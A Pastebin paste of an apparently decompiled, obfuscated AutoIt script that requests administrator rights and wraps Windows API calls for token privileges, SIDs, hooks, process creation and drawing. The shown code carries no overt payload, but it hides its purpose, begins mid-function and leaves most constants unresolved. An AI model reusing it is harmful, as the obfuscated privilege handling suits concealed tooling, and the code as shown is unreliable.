Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #RequireAdmin
- #Region
- #AutoIt3Wrapper_Icon=Icon.ico
- #AutoIt3Wrapper_Compression=4
- #EndRegion
- IF NOT ISDECLARED("Os")THEN
- IF @ERROR THEN RETURN SETERROR(NUMBER($Var0000 ),@EXTENDED,NUMBER($Var0001 ))
- LOCAL $Local0000 =DLLCALL($Var0002 ,$Var0003 ,$Var0004 ,$Var0005 ,$Var0006 ,$Var0007 ,$Local0071 ,$Var0008 ,$Var0009 ,$Var000A ,NUMBER($Var000B ))
- IF @ERROR OR NOT $Local0000 [NUMBER($Var000C )]THEN RETURN SETERROR(NUMBER($Var000D ),@EXTENDED,NUMBER($Var000E ))
- RETURN $Local0000 [NUMBER($Var000F )]
- ENDFUNC
- Func Fn0000($Arg00,$ArgOpt01=0,$ArgOpt02=FALSE )
- LOCAL $Local0001 =A5410403741($Arg00,$ArgOpt01,$ArgOpt02)
- IF $Local0001 = 0 THEN
- IF A1000604D34()<>$Var0010 THEN RETURN SETERROR( 3 ,A1000604D34(), 0 )
- IF NOT A3100E04B51()THEN RETURN SETERROR( 1 ,A1000604D34(), 0 )
- $Local0001 =A5410403741($Arg00,$ArgOpt01,$ArgOpt02)
- IF $Local0001 = 0 THEN RETURN SETERROR( 2 ,A1000604D34(), 0 )
- ENDIF
- RETURN $Local0001
- ENDFUNC
- Func Fn0001($Arg00,$Arg01,$Arg02)
- LOCAL $Local0002 =A2610202529("",$Arg01)
- IF $Local0002 = 0 THEN RETURN SETERROR( 1 ,@EXTENDED,FALSE )
- LOCAL $Local0003 =DLLSTRUCTCREATE($Var0011 )
- LOCAL $Local0004 =DLLSTRUCTGETSIZE($Local0003 )
- LOCAL $Local0005 =DLLSTRUCTCREATE($Var0011 )
- LOCAL $Local0006 =DLLSTRUCTGETSIZE($Local0005 )
- LOCAL $Local0007 =DLLSTRUCTCREATE("int Data" )
- DLLSTRUCTSETDATA($Local0003 ,"Count" , 1 )
- DLLSTRUCTSETDATA($Local0003 ,"LUID" ,$Local0002 )
- IF NOT A480080550A($Arg00,FALSE ,$Local0003 ,$Local0004 ,$Local0005 ,$Local0007 )THEN RETURN SETERROR( 2 ,@ERROR,FALSE )
- DLLSTRUCTSETDATA($Local0005 ,"Count" , 1 )
- DLLSTRUCTSETDATA($Local0005 ,"LUID" ,$Local0002 )
- LOCAL $Local0008 =DLLSTRUCTGETDATA($Local0005 ,"Attributes")
- IF $Arg02 THEN
- $Local0008 =BITOR($Local0008 ,$Var0012 )
- ELSE
- $Local0008 =BITAND($Local0008 ,BITNOT($Var0012 ))
- ENDIF
- DLLSTRUCTSETDATA($Local0005 ,"Attributes",$Local0008 )
- IF NOT A480080550A($Arg00,FALSE ,$Local0005 ,$Local0006 ,$Local0003 ,$Local0007 )THEN RETURN SETERROR( 3 ,@ERROR,FALSE )
- RETURN TRUE
- ENDFUNC
- Func Fn0002($Arg00,$Arg01,$Arg02,$Arg03)
- LOCAL $Local0000 =DLLCALL("advapi32.dll","bool" ,"SetTokenInformation","handle" ,$Arg00,"int" ,$Arg01,"struct*" ,$Arg02,"dword" ,$Arg03)
- IF @ERROR OR NOT $Local0000 [ 0 ]THEN RETURN SETERROR( 1 ,@EXTENDED,FALSE )
- RETURN TRUE
- ENDFUNC
- Func Fn0003($Arg00)
- IF NOT A4300F0145B($Arg00)THEN RETURN SETERROR( 1 , 0 ,"")
- LOCAL $Local0000 =DLLCALL("advapi32.dll","bool" ,"ConvertSidToStringSidW","struct*" ,$Arg00,"ptr*" , 0 )
- IF @ERROR OR NOT $Local0000 [ 0 ]THEN RETURN SETERROR( 2 ,@EXTENDED,"")
- LOCAL $Local0009 =$Local0000 [ 2 ]
- LOCAL $Local000A =DLLSTRUCTGETDATA(DLLSTRUCTCREATE("wchar Text["&Fn00C3($Local0009 )+ 1 &"]" ,$Local0009 ),"Text" )
- Fn0088($Local0009 )
- RETURN $Local000A
- ENDFUNC
- Func Fn0004($Arg00)
- SWITCH $Arg00
- CASE $Var0013
- RETURN "User"
- CASE $Var0014
- RETURN "Group"
- CASE $Var0015
- RETURN "Domain"
- CASE $Var0016
- RETURN "Alias"
- CASE $Var0017
- RETURN "Well Known Group"
- CASE $Var0018
- RETURN "Deleted Account"
- CASE $Var0019
- RETURN "Invalid"
- CASE $Var001A
- RETURN "Unknown Type"
- CASE $Var001B
- RETURN "Computer"
- CASE $Var001C
- RETURN "A mandatory integrity label SID"
- CASE ELSE
- RETURN "Unknown SID Type"
- ENDSWITCH
- ENDFUNC
- Func Fn0005($Arg00)
- LOCAL $Local0000 =DLLCALL("advapi32.dll","bool" ,"ConvertStringSidToSidW","wstr" ,$Arg00,"ptr*" , 0 )
- IF @ERROR OR NOT $Local0000 [ 0 ]THEN RETURN SETERROR( 1 ,@EXTENDED, 0 )
- LOCAL $Local000B =$Local0000 [ 2 ]
- LOCAL $Local000C =DLLSTRUCTCREATE("byte Data["&A3400C03E5E($Local000B )&"]" ,$Local000B )
- LOCAL $Local000D =DLLSTRUCTCREATE("byte Data["&DLLSTRUCTGETSIZE($Local000C )&"]" )
- DLLSTRUCTSETDATA($Local000D ,"Data" ,DLLSTRUCTGETDATA($Local000C ,"Data" ))
- Fn0088($Local000B )
- RETURN $Local000D
- ENDFUNC
- Func Fn0006($Arg00,$Arg01,$ArgOpt02=0,$ArgOpt03=0,$ArgOpt04=0,$ArgOpt05="wparam",$ArgOpt06="lparam",$ArgOpt07="lresult")
- LOCAL $Local000E =DLLCALL("user32.dll",$ArgOpt07,"SendMessageW","hwnd" ,$Arg00,"uint" ,$Arg01,$ArgOpt05,$ArgOpt02,$ArgOpt06,$ArgOpt03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
- IF $ArgOpt04>= 0 AND $ArgOpt04<= 4 THEN RETURN $Local000E [$ArgOpt04]
- RETURN $Local000E
- ENDFUNC
- Func Fn0007($Arg00,$Arg01,$ArgOpt02=0,$ArgOpt03=0,$ArgOpt04=0,$ArgOpt05="wparam",$ArgOpt06="lparam",$ArgOpt07="lresult")
- LOCAL $Local000E =DLLCALL("user32.dll",$ArgOpt07,"SendMessageA","hwnd" ,$Arg00,"uint" ,$Arg01,$ArgOpt05,$ArgOpt02,$ArgOpt06,$ArgOpt03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
- IF $ArgOpt04>= 0 AND $ArgOpt04<= 4 THEN RETURN $Local000E [$ArgOpt04]
- RETURN $Local000E
- ENDFUNC
- GLOBAL $Var001D [NUMBER($Var001E )][NUMBER($Var001F )]=[[NUMBER($Var0020 ),NUMBER($Var0021 )]]
- GLOBAL $Var0022 [NUMBER($Var0023 )][NUMBER($Var0024 )]=[[NUMBER($Var0025 ),NUMBER($Var0026 )]]
- GLOBAL CONST $Var0027 =NUMBER($Var0028 )
- GLOBAL CONST $Var0029 =NUMBER($Var002A )
- GLOBAL CONST $Var002B =NUMBER($Var002C )
- GLOBAL CONST $Var002D =NUMBER($Var002E )
- GLOBAL CONST $Var002F =NUMBER($Var0030 )
- GLOBAL CONST $Var0031 =NUMBER($Var0032 )
- GLOBAL CONST $Var0033 =NUMBER($Var0034 )
- GLOBAL CONST $Var0035 =NUMBER($Var0036 )
- GLOBAL CONST $Var0037 =NUMBER($Var0038 )
- GLOBAL CONST $Var0039 =NUMBER($Var003A )
- GLOBAL CONST $Var003B =PTR(-NUMBER($Var003C ))
- GLOBAL CONST $Var003D =PTR(-NUMBER($Var003E ))
- GLOBAL CONST $Var003F =-NUMBER($Var0040 )
- GLOBAL CONST $Var0041 =NUMBER($Var0042 )
- GLOBAL CONST $Var0043 =NUMBER($Var0044 )
- GLOBAL CONST $Var0045 =NUMBER($Var0046 )
- GLOBAL CONST $Var0047 =NUMBER($Var0048 )
- GLOBAL CONST $Var0049 =NUMBER($Var004A )
- GLOBAL CONST $Var004B =NUMBER($Var004C )
- GLOBAL CONST $Var004D =NUMBER($Var004E )
- GLOBAL CONST $Var004F =NUMBER($Var0050 )
- GLOBAL CONST $Var0051 =NUMBER($Var0052 )
- GLOBAL CONST $Var0053 =NUMBER($Var0054 )
- GLOBAL CONST $Var0055 =NUMBER($Var0056 )
- GLOBAL CONST $Var0057 =NUMBER($Var0058 )
- GLOBAL CONST $Var0059 =NUMBER($Var005A )
- GLOBAL CONST $Var005B =NUMBER($Var005C )
- GLOBAL CONST $Var005D =NUMBER($Var005E )
- GLOBAL CONST $Var005F =NUMBER($Var0060 )
- GLOBAL CONST $Var0061 =NUMBER($Var0062 )
- GLOBAL CONST $Var0063 =NUMBER($Var0064 )
- GLOBAL CONST $Var0065 =NUMBER($Var0066 )
- GLOBAL CONST $Var0067 =NUMBER($Var0068 )
- GLOBAL CONST $Var0069 =NUMBER($Var006A )
- GLOBAL CONST $Var006B =NUMBER($Var006C )
- GLOBAL CONST $Var006D =NUMBER($Var006E )
- GLOBAL CONST $Var006F =NUMBER($Var0070 )
- GLOBAL CONST $Var0071 =$Var0065
- GLOBAL CONST $Var0072 =NUMBER($Var0073 )
- GLOBAL CONST $Var0074 =NUMBER($Var0075 )
- GLOBAL CONST $Var0076 =NUMBER($Var0077 )
- GLOBAL CONST $Var0078 =NUMBER($Var0079 )
- GLOBAL CONST $Var007A =NUMBER($Var007B )
- GLOBAL CONST $Var007C =NUMBER($Var007D )
- GLOBAL CONST $Var007E =NUMBER($Var007F )
- GLOBAL CONST $Var0080 =NUMBER($Var0081 )
- GLOBAL CONST $Var0082 =NUMBER($Var0083 )
- GLOBAL CONST $Var0084 =NUMBER($Var0085 )
- GLOBAL CONST $Var0086 =NUMBER($Var0087 )
- GLOBAL CONST $Var0088 =NUMBER($Var0089 )
- GLOBAL CONST $Var008A =NUMBER($Var008B )
- GLOBAL CONST $Var008C =NUMBER($Var008D )
- GLOBAL CONST $Var008E =NUMBER($Var008F )
- GLOBAL CONST $Var0090 =NUMBER($Var0091 )
- GLOBAL CONST $Var0092 =NUMBER($Var0093 )
- GLOBAL CONST $Var0094 =NUMBER($Var0095 )
- GLOBAL CONST $Var0096 =NUMBER($Var0097 )
- GLOBAL CONST $Var0098 =NUMBER($Var0099 )
- GLOBAL CONST $Var009A =NUMBER($Var009B )
- GLOBAL CONST $Var009C =NUMBER($Var009D )
- GLOBAL CONST $Var009E =NUMBER($Var009F )
- GLOBAL CONST $Var00A0 =NUMBER($Var00A1 )
- GLOBAL CONST $Var00A2 =NUMBER($Var00A3 )
- GLOBAL CONST $Var00A4 =NUMBER($Var00A5 )
- GLOBAL CONST $Var00A6 =NUMBER($Var00A7 )
- GLOBAL CONST $Var00A8 =NUMBER($Var00A9 )
- GLOBAL CONST $Var00AA =NUMBER($Var00AB )
- GLOBAL CONST $Var00AC =NUMBER($Var00AD )
- GLOBAL CONST $Var00AE =NUMBER($Var00AF )
- GLOBAL CONST $Var00B0 =-NUMBER($Var00B1 )
- GLOBAL CONST $Var00B2 =NUMBER($Var00B3 )
- GLOBAL CONST $Var00B4 =NUMBER($Var00B5 )
- GLOBAL CONST $Var00B6 =NUMBER($Var00B7 )
- GLOBAL CONST $Var00B8 =NUMBER($Var00B9 )
- GLOBAL CONST $Var00BA =NUMBER($Var00BB )
- GLOBAL CONST $Var00BC =NUMBER($Var00BD )
- GLOBAL CONST $Var00BE =NUMBER($Var00BF )
- GLOBAL CONST $Var00C0 =NUMBER($Var00C1 )
- GLOBAL CONST $Var00C2 =BITSHIFT($Var00BC ,NUMBER($Var00C3 ))
- GLOBAL CONST $Var00C4 =NUMBER($Var00C5 )
- GLOBAL CONST $Var00C6 =BITSHIFT($Var00BE ,NUMBER($Var00C7 ))
- GLOBAL CONST $Var00C8 =BITSHIFT($Var00C0 ,NUMBER($Var00C9 ))
- GLOBAL CONST $Var00CA =NUMBER($Var00CB )
- GLOBAL CONST $Var00CC =NUMBER($Var00CD )
- GLOBAL CONST $Var00CE =NUMBER($Var00CF )
- GLOBAL CONST $Var00D0 =NUMBER($Var00D1 )
- GLOBAL CONST $Var00D2 =NUMBER($Var00D3 )
- GLOBAL CONST $Var00D4 =NUMBER($Var00D5 )
- GLOBAL CONST $Var00D6 =NUMBER($Var00D7 )
- GLOBAL CONST $Var00D8 =NUMBER($Var00D9 )
- GLOBAL CONST $Var00DA =NUMBER($Var00DB )
- GLOBAL CONST $Var00DC =NUMBER($Var00DD )
- GLOBAL CONST $Var00DE =NUMBER($Var00DF )
- GLOBAL CONST $Var00E0 =NUMBER($Var00E1 )
- GLOBAL CONST $Var00E2 =NUMBER($Var00E3 )
- GLOBAL CONST $Var00E4 =NUMBER($Var00E5 )
- GLOBAL CONST $Var00E6 =NUMBER($Var00E7 )
- GLOBAL CONST $Var00E8 =NUMBER($Var00E9 )
- GLOBAL CONST $Var00EA =NUMBER($Var00EB )
- GLOBAL CONST $Var00EC =NUMBER($Var00ED )
- GLOBAL CONST $Var00EE =NUMBER($Var00EF )
- GLOBAL CONST $Var00F0 =NUMBER($Var00F1 )
- GLOBAL CONST $Var00F2 =NUMBER($Var00F3 )
- GLOBAL CONST $Var00F4 =NUMBER($Var00F5 )
- GLOBAL CONST $Var00F6 =NUMBER($Var00F7 )
- GLOBAL CONST $Var00F8 =NUMBER($Var00F9 )
- GLOBAL CONST $Var00FA =NUMBER($Var00FB )
- GLOBAL CONST $Var00FC =NUMBER($Var00FD )
- GLOBAL CONST $Var00FE =NUMBER($Var00FF )
- GLOBAL CONST $Var0100 =NUMBER($Var0101 )
- GLOBAL CONST $Var0102 =NUMBER($Var0103 )
- GLOBAL CONST $Var0104 =NUMBER($Var0105 )
- GLOBAL CONST $Var0106 =NUMBER($Var0107 )
- GLOBAL CONST $Var0108 =NUMBER($Var0109 )
- GLOBAL CONST $Var010A =NUMBER($Var010B )
- GLOBAL CONST $Var010C =$Var010D &$Var010E
- GLOBAL CONST $Var010F =$Var0110
- GLOBAL CONST $Var0111 =$Var0112
- GLOBAL CONST $Var0113 =$Var0114
- GLOBAL CONST $Var0115 =$Var0116 &$Var0117 &$Var0118
- Func Fn0008($ArgOpt00=-1)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"AttachConsole","dword" ,$ArgOpt00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0009($Arg00,$Arg01,$Arg02)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"AttachThreadInput","dword" ,$Arg00,"dword" ,$Arg01,"bool" ,$Arg02)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn000A($ArgOpt00=500,$ArgOpt01=1000)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"Beep" ,"dword" ,$ArgOpt00,"dword" ,$ArgOpt01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn000B($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05,$Arg06,$Arg07,$Arg08)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"bool" ,"BitBlt" ,"handle" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02,"int" ,$Arg03,"int" ,$Arg04,"handle" ,$Arg05,"int" ,$Arg06,"int" ,$Arg07,"dword" ,$Arg08)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn000C($Arg00,$Arg01,$Arg02,$Arg03)
- LOCAL $Local000E =DLLCALL("user32.dll","lresult" ,"CallNextHookEx","handle" ,$Arg00,"int" ,$Arg01,"wparam" ,$Arg02,"lparam" ,$Arg03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn000D($Arg00,$Arg01,$Arg02,$Arg03,$Arg04)
- LOCAL $Local000E =DLLCALL("user32.dll","lresult" ,"CallWindowProc","ptr" ,$Arg00,"hwnd" ,$Arg01,"uint" ,$Arg02,"wparam" ,$Arg03,"lparam" ,$Arg04)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn000E($Arg00,BYREF $ArgRef01)
- DLLCALL("user32.dll","bool" ,"ClientToScreen","hwnd" ,$Arg00,"struct*" ,$ArgRef01)
- RETURN SETERROR(@ERROR,@EXTENDED,$ArgRef01)
- ENDFUNC
- Func Fn000F($Arg00)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"CloseHandle","handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0010($Arg00,$Arg01,$Arg02,$Arg03)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"int" ,"CombineRgn","handle" ,$Arg00,"handle" ,$Arg01,"handle" ,$Arg02,"int" ,$Arg03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0011()
- LOCAL CONST $Var0119 =0xFFFF
- LOCAL CONST $Var011A = 6
- LOCAL CONST $Var011B = 2
- LOCAL CONST $Var011C = 7
- LOCAL CONST $Var011D = 5
- LOCAL CONST $Var011E = 8
- LOCAL CONST $Var011F = 9
- LOCAL CONST $Var0120 = 10
- LOCAL CONST $Var0121 = 4
- LOCAL CONST $Var0122 =0x000B
- LOCAL CONST $Var0123 = 3
- LOCAL CONST $Var0124 =0x000C
- LOCAL CONST $Var0125 = 1
- LOCAL CONST $Var0126 =0x3003
- LOCAL CONST $Var0127 =0x3002
- LOCAL CONST $Var0128 =0x3001
- LOCAL $Local000E =DLLCALL("comdlg32.dll","dword" ,"CommDlgExtendedError")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- SWITCH $Local000E [ 0 ]
- CASE $Var0119
- RETURN SETERROR($Local000E [ 0 ], 0 ,"The dialog box could not be created."& @LF &"The common dialog box function's call to the DialogBox function failed."& @LF &"For example, this error occurs if the common dialog box call specifies an invalid window handle.")
- CASE $Var011A
- RETURN SETERROR($Local000E [ 0 ], 0 ,"The common dialog box function failed to find a specified resource.")
- CASE $Var011B
- RETURN SETERROR($Local000E [ 0 ], 0 ,"The common dialog box function failed during initialization."& @LF &"This error often occurs when sufficient memory is not available.")
- CASE $Var011C
- RETURN SETERROR($Local000E [ 0 ], 0 ,"The common dialog box function failed to load a specified resource.")
- CASE $Var011D
- RETURN SETERROR($Local000E [ 0 ], 0 ,"The common dialog box function failed to load a specified string.")
- CASE $Var011E
- RETURN SETERROR($Local000E [ 0 ], 0 ,"The common dialog box function failed to lock a specified resource.")
- CASE $Var011F
- RETURN SETERROR($Local000E [ 0 ], 0 ,"The common dialog box function was unable to allocate memory for internal structures.")
- CASE $Var0120
- RETURN SETERROR($Local000E [ 0 ], 0 ,"The common dialog box function was unable to lock the memory associated with a handle.")
- CASE $Var0121
- RETURN SETERROR($Local000E [ 0 ], 0 ,"The ENABLETEMPLATE flag was set in the Flags member of the initialization structure for the corresponding common dialog box,"& @LF &"but you failed to provide a corresponding instance handle.")
- CASE $Var0122
- RETURN SETERROR($Local000E [ 0 ], 0 ,"The ENABLEHOOK flag was set in the Flags member of the initialization structure for the corresponding common dialog box,"& @LF &"but you failed to provide a pointer to a corresponding hook procedure.")
- CASE $Var0123
- RETURN SETERROR($Local000E [ 0 ], 0 ,"The ENABLETEMPLATE flag was set in the Flags member of the initialization structure for the corresponding common dialog box,"& @LF &"but you failed to provide a corresponding template.")
- CASE $Var0124
- RETURN SETERROR($Local000E [ 0 ], 0 ,"The RegisterWindowMessage function returned an error code when it was called by the common dialog box function.")
- CASE $Var0125
- RETURN SETERROR($Local000E [ 0 ], 0 ,"The lStructSize member of the initialization structure for the corresponding common dialog box is invalid")
- CASE $Var0126
- RETURN SETERROR($Local000E [ 0 ], 0 ,"The buffer pointed to by the lpstrFile member of the OPENFILENAME structure is too small for the file name specified by the user."& @LF &"The first two bytes of the lpstrFile buffer contain an integer value specifying the size, in TCHARs, required to receive the full name.")
- CASE $Var0127
- RETURN SETERROR($Local000E [ 0 ], 0 ,"A file name is invalid.")
- CASE $Var0128
- RETURN SETERROR($Local000E [ 0 ], 0 ,"An attempt to subclass a list box failed because sufficient memory was not available.")
- ENDSWITCH
- RETURN HEX($Local000E [ 0 ])
- ENDFUNC
- Func Fn0012($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"CopyIcon" ,"handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0013($Arg00,$Arg01,$ArgOpt02=1,$ArgOpt03=1,$ArgOpt04=0)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreateBitmap","int" ,$Arg00,"int" ,$Arg01,"uint" ,$ArgOpt02,"uint" ,$ArgOpt03,"ptr" ,$ArgOpt04)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0014($Arg00,$Arg01,$Arg02)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreateCompatibleBitmap","handle" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0015($Arg00)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreateCompatibleDC","handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0016($ArgOpt00=0,$ArgOpt01=TRUE ,$ArgOpt02=TRUE ,$ArgOpt03="")
- LOCAL $Local000F ="wstr"
- IF $ArgOpt03="" THEN
- $ArgOpt03= 0
- $Local000F ="ptr"
- ENDIF
- LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"CreateEventW","ptr" ,$ArgOpt00,"bool" ,$ArgOpt01,"bool" ,$ArgOpt02,$Local000F ,$ArgOpt03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0017($Arg00,$Arg01,$ArgOpt02=4,$ArgOpt03=0,$ArgOpt04=0,$ArgOpt05=0)
- LOCAL $Local0010 = 0 ,$Var0129 = 0 ,$Var012A = 0 ,$Var012B = 0
- IF BITAND($ArgOpt02, 1 )<> 0 THEN $Local0010 =BITOR($Local0010 ,$Var012C )
- IF BITAND($ArgOpt02, 2 )<> 0 THEN $Local0010 =BITOR($Local0010 ,$Var012D )
- IF BITAND($ArgOpt02, 4 )<> 0 THEN $Local0010 =BITOR($Local0010 ,$Var012E )
- IF BITAND($ArgOpt03, 1 )<> 0 THEN $Var0129 =BITOR($Var0129 ,$Var012F )
- IF BITAND($ArgOpt03, 2 )<> 0 THEN $Var0129 =BITOR($Var0129 ,$Var0130 )
- IF BITAND($ArgOpt03, 4 )<> 0 THEN $Var0129 =BITOR($Var0129 ,$Var0131 )
- SWITCH $Arg01
- CASE 0
- $Var012A =$Var0132
- CASE 1
- $Var012A =$Var0133
- CASE 2
- $Var012A =$Var0134
- CASE 3
- $Var012A =$Var0135
- CASE 4
- $Var012A =$Var0136
- ENDSWITCH
- IF BITAND($ArgOpt04, 1 )<> 0 THEN $Var012B =BITOR($Var012B ,$Var0137 )
- IF BITAND($ArgOpt04, 2 )<> 0 THEN $Var012B =BITOR($Var012B ,$Var0138 )
- IF BITAND($ArgOpt04, 4 )<> 0 THEN $Var012B =BITOR($Var012B ,$Var0139 )
- IF BITAND($ArgOpt04, 8 )<> 0 THEN $Var012B =BITOR($Var012B ,$Var013A )
- LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"CreateFileW","wstr" ,$Arg00,"dword" ,$Local0010 ,"dword" ,$Var0129 ,"ptr" ,$ArgOpt05,"dword" ,$Var012A ,"dword" ,$Var012B ,"ptr" , 0 )
- IF @ERROR OR $Local000E [ 0 ]=PTR(- 1 )THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0018($Arg00,$Arg01,$ArgOpt02=0,$ArgOpt03=0,$ArgOpt04=$Var0029 ,$ArgOpt05=FALSE ,$ArgOpt06=FALSE ,$ArgOpt07=FALSE ,$ArgOpt08=$Var002B ,$ArgOpt09=$Var002D ,$ArgOpt0A=$Var002F ,$ArgOpt0B=$Var0031 ,$ArgOpt0C=0,$ArgOpt0D="Arial")
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreateFontW","int" ,$Arg00,"int" ,$Arg01,"int" ,$ArgOpt02,"int" ,$ArgOpt03,"int" ,$ArgOpt04,"dword" ,$ArgOpt05,"dword" ,$ArgOpt06,"dword" ,$ArgOpt07,"dword" ,$ArgOpt08,"dword" ,$ArgOpt09,"dword" ,$ArgOpt0A,"dword" ,$ArgOpt0B,"dword" ,$ArgOpt0C,"wstr" ,$ArgOpt0D)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0019($Arg00)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreateFontIndirectW","struct*" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn001A($Arg00,$Arg01,$Arg02)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreatePen" ,"int" ,$Arg00,"int" ,$Arg01,"dword" ,$Arg02)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn001B($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05,$Arg06,$Arg07,$Arg08,$Arg09)
- LOCAL $Local0011 = 0
- LOCAL $Local0012 ="wstr" ,$Var013B ="wstr"
- IF $Arg00="" THEN
- $Local0012 ="ptr"
- $Arg00= 0
- ENDIF
- IF $Arg01<>"" THEN
- $Local0011 =DLLSTRUCTCREATE("wchar Text["&0x0104 + 1 &"]" )
- DLLSTRUCTSETDATA($Local0011 ,"Text" ,$Arg01)
- ENDIF
- IF $Arg07="" THEN
- $Var013B ="ptr"
- $Arg07= 0
- ENDIF
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"CreateProcessW",$Local0012 ,$Arg00,"struct*" ,$Local0011 ,"ptr" ,$Arg02,"ptr" ,$Arg03,"bool" ,$Arg04,"dword" ,$Arg05,"ptr" ,$Arg06,$Var013B ,$Arg07,"ptr" ,$Arg08,"ptr" ,$Arg09)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn001C($Arg00,$Arg01,$Arg02,$Arg03)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreateRectRgn","int" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02,"int" ,$Arg03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn001D($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreateRoundRectRgn","int" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02,"int" ,$Arg03,"int" ,$Arg04,"int" ,$Arg05)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn001E($Arg00,$Arg01,$Arg02,$Arg03,$ArgOpt04=1)
- LOCAL $Local0013 =Fn004E($Arg00)
- LOCAL $Local0014 =Fn0015($Local0013 )
- LOCAL $Local0015 =Fn0014($Local0013 ,$Arg02,$Arg03)
- LOCAL $Local0016 =Fn00A5($Local0014 ,$Local0015 )
- LOCAL $Local0017 =DLLSTRUCTCREATE($Var013C )
- DLLSTRUCTSETDATA($Local0017 , 1 , 0 )
- DLLSTRUCTSETDATA($Local0017 , 2 , 0 )
- DLLSTRUCTSETDATA($Local0017 , 3 ,$Arg02)
- DLLSTRUCTSETDATA($Local0017 , 4 ,$Arg03)
- IF $ArgOpt04 THEN
- $Arg01=BITOR(BITAND($Arg01,0xFF00 ),BITSHIFT(BITAND($Arg01,0x00FF ),-0x0010 ),BITSHIFT(BITAND($Arg01,0x00FF0000 ),0x0010 ))
- ENDIF
- LOCAL $Local0018 =Fn001F($Arg01)
- Fn0038($Local0014 ,$Local0017 ,$Local0018 )
- IF @ERROR THEN
- Fn0023($Local0015 )
- $Local0015 = 0
- ENDIF
- Fn0023($Local0018 )
- Fn00A3($Arg00,$Local0013 )
- Fn00A5($Local0014 ,$Local0016 )
- Fn0022($Local0014 )
- IF NOT $Local0015 THEN RETURN SETERROR( 1 , 0 , 0 )
- RETURN $Local0015
- ENDFUNC
- Func Fn001F($Arg00)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreateSolidBrush","dword" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
